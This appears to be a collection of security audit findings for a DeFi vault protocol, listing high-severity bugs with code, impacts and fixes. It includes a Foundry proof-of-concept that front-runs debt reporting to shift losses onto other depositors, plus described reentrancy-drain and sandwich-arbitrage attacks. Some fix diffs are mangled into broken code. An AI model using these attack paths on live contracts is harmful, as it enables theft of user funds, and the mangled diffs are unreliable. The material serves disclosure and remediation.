```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n
Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPull
high
In the `_withdraw` function, Destination Vault rewards will be first recorded in `info.IdleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled` > info.totalAssetsToPull, `info.idleIncrease` is directly assigned as `info.totalAssetsPulled` - info.totalAssetsToPull, and `info.totalAssetsPulled` is `assetPulled` without considering Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.
`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`
The final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.
```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n
Liquidations miss delegate call to swapper
high
The LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pul them either (swap function here). Because of this the function reverses.\\nI noticed that there is no transfer back to LiquidationRow from Swapper either. Tokens can't get in or out.\\nWhen I searched the codebase, I found that Swapper is being called on another place using the delegatecall method. This way it can operate with the tokens of the caller. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So I think that instead of missing transfer, the problem is actually in the way how swapper is called.
Change the async swapper call from the normal function call to the low-level delegatecall function the same way it is done in LMPVaultRouter.sol:swapAndDepositToVault.\\nI would like to address that AsyncSwapperMock in LiquidationRow.t.sol is a poorly written mock and should be updated to represent how the AsyncSwapper work. It would be nice to update the test suite for LiquidationRow because its current state won't catch this. If you check the LiquidationRow.t.sol tests, the mock swap function only mints tokens, no need to use delegatecall. This is why tests missed this vulnerability.
Rewards collected through LiquidationRow claimsVaultRewards get stuck in the contract. Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.
```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n
When `queueNewRewards` is called, caller could transfer tokens more than it should be
high
Inside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n\\nHowever, when this function tried to pull funds from sender via `safeTransferFrom`, it used `newRewards` amount, which already added by `startingQueuedRewards`. If previously `queuedRewards` already have value, the processed amount will be wrong.
Update the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\n
There are two possible issue here :\\nIf previously `queuedRewards` is not 0, and the caller don't have enough funds or approval, the call will revert due to this logic error.\\nIf previously `queuedRewards` is not 0, and the caller have enough funds and approval, the caller funds will be pulled more than it should (reward param + `queuedRewards` )
```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n
Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokens
high
`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, it would take `msg.value` instead of transfer WETH from user. And it would make a raw call instead of transfer WETH to user.\\nIf raw call is sent to user, then they could reenter LMP vault and attack the protocol and it would be successful cause CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves\\nDeposit shares at fair price\\nRemove liquidity on Curve and updateDebtReporting in LMPVault with view only reentrancy\\nWithdraw shares at unfair price
If CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\n
The protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many asset for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk cause a large portion of their deposit would be on Curve V2 pools with WETH token.
```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n
updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profit
high
updateDebtReporting takes in a user input of destinations in array whose debt to report, so if a destination vault is incurring loss and is not on the front of withdrawalQueue than a attacker can just update debt for only the destination which are incurring a profit and withdraw in the same txn. He will exit the vault with profit, others who withdraw after the legit updateDebtReporting txn will suffer even more loss than they should have, as some part of the profit which was used to offset the loss was taken by the attacker and protocol fees\\nPOC-\\nLMPVault has 2000 in deposits 1000 from alice and 1000 from bob\\nVault has invested that in 1000 in DestinationVault1 & 1000 in DestinationVault2 (no idle for simple calculations)\\nNow Dv1 gain a profit of 5%(+50 base asset) while Dv2 is in 10% loss(-100 base asset)\\nSo vault has net loss of 50. Now alice does a updateDebtReporting([Dv1]) and not including Dv2 in the input array.\\nNow she withdraws her money, protocol now falsely believes there is a profit, it also take 20% profit fees(assumed) and mints 10 shares for itself and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legit updateDebtReporting txn comes and bob has to account in for the loss\\nTest for POC - Add it to LMPVaultMintingTests contract in LMPVault-Withdraw.t.sol file under path test/vault. run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n\\n// for simplicity sake, i'll be assuming vault keeps nothing idle\\n\\n// as it does not affect the attack vector in any ways\\n\\n_accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n\\n_accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\naddress feeSink = vm.addr(555);\\n\\n_lmpVault.setFeeSink(feeSink);\\n\\n_lmpVault.setPerformanceFeeBps(2000); // 20%\\n\\naddress alice = address(789);\\n\\nuint initialBalanceAlice = 1000;\\n\\n// User is going to deposit 1000 asset\\n\\n_asset.mint(address(this), 1000);\\n\\n_asset.approve(address(_lmpVault), 1000);\\n\\nuint shareBalUser = _lmpVault.deposit(1000, address(this));\\n\\n_underlyerOne.mint(address(this),500);\\n\\n_underlyerOne.approve(address(_lmpVault),500);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultOne),\\n\\naddress(_underlyerOne),\\n\\n500,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n_asset.mint(alice,initialBalanceAlice);\\n\\nvm.startPrank(alice);\\n\\n_asset.approve(address(_lmpVault),initialBalanceAlice);\\n\\nuint shareBalAlice = _lmpVault.deposit(initialBalanceAlice,alice);\\n\\nvm.stopPrank();\\n\\n// rebalance to 2nd vault\\n\\n_underlyerTwo.mint(address(this), 1000);\\n\\n_underlyerTwo.approve(address(_lmpVault),1000);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultTwo),\\n\\naddress(_underlyerTwo),\\n\\n1000,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n// the second destVault incurs loss, 10%\\n\\n_mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n\\n \\n\\n// the first vault incurs some profit, 5%\\n\\n// so lmpVault is in netLoss of 50 baseAsset\\n\\n_mockRootPrice(address(_underlyerOne), 2.1 ether);\\n\\n// malicious updateDebtReporting by alice\\n\\naddress[] memory alteredDestinations = new address[](1);\\n\\nalteredDestinations[0] = address(_destVaultOne);\\n\\nvm.prank(alice);\\n\\n_lmpVault.updateDebtReporting(alteredDestinations);\\n\\n \\n\\n// alice withdraws first\\n\\nvm.prank(alice);\\n\\n_lmpVault.redeem(shareBalAlice , alice,alice);\\n\\nuint finalBalanceAlice = _asset.balanceOf(alice);\\n\\nemit log_named_uint("final Balance of alice ", finalBalanceAlice);\\n\\n// protocol also collects its fees\\n\\n// further wrecking the remaining LPs\\n\\nemit log_named_uint("Fees shares give to feeSink ", _lmpVault.balanceOf(feeSink));\\n\\nassertGt( finalBalanceAlice, initialBalanceAlice);\\n\\nassertGt(_lmpVault.balanceOf(feeSink), 0);\\n\\n// now updateDebtReporting again but for all DVs\\n\\n_lmpVault.updateDebtReporting(_destinations);\\n\\n \\n\\nemit log_named_uint("Remaining LPs can only get ",_lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint("Protocol falsely earned(in base asset)", _lmpVault.maxWithdraw(feeSink));\\n\\nemit log_named_uint("Vault totalAssets" , _lmpVault.totalAssets());\\n\\nemit log_named_uint("Effective loss take by LPs", 1000 - _lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint("Profit for Alice",_asset.balanceOf(alice) - initialBalanceAlice);\\n\\n}\\n```\\n\\nLogs: final Balance of alice : 1019 Fees shares give to feeSink : 10 Remaining LPs can only get : 920 Protocol falsely earned(in base asset): 9 Vault totalAssets: 930 Effective loss take by LPs: 80 Profit for Alice: 19
updateDebtReporting should not have any input param, should by default update for all added destination vaults
Theft of user funds. Submitting as high as attacker only needs to frontrun a updateDebtReporting txn with malicious input and withdraw his funds.
```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n
Inflated price due to unnecessary precision scaling
high
The `price` at Line 137 below is denominated in 18 decimals as the `getPriceInEth` function always returns the `price` in 18 decimals precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (existing._initAcc) to be inflated significantly\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, the `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function return 3 ETH (3e18). Thus, the following code will be executed at Line 144s and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by the scale of 1e18, which results in the prices being extremely skewed.\\nUsing the formula of fast filter, the final fast filter price computed will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed only to be worth around 3 ETH. However, the fast filter price wrongly determine that it is worth around 1340000000000000000 ETH\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\n
Remove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\n
The price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.
```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n
Immediately start getting rewards belonging to others after staking
high
Note This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. However, this turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\n
Ensure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, "account");\\n Errors.verifyNotZero(amount, "amount");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\n
Loss of reward tokens for the vault shareholders.
```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n
Differences between actual and cached total assets can be arbitraged
high
The actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is receiving more shares than expected.\\nIf Bob redeems all his nine (9) shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\\n$$ \\begin{align} assetsReceived &= \\frac{9.090909091e18\\ shares}{(100e18 + 9.090909091e18)\\ shares} \\times (115 + 10)\\ ETH \\ &= \\frac{9.090909091e18\\ shares}{109.090909091e18\\ shares} \\times 125 ETH \\ &= 10.41666667\\ ETH \\end{align} $$\\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. Bob gains is the loss of other vault shareholders.\\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-run it to take advantage of the lower-than-expected price or NAV/share, and back-run it to sell the shares when the price or NAV/share rises after the update.\\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, perform an update on the total assets, and deposit at a lower price or NAV/share.
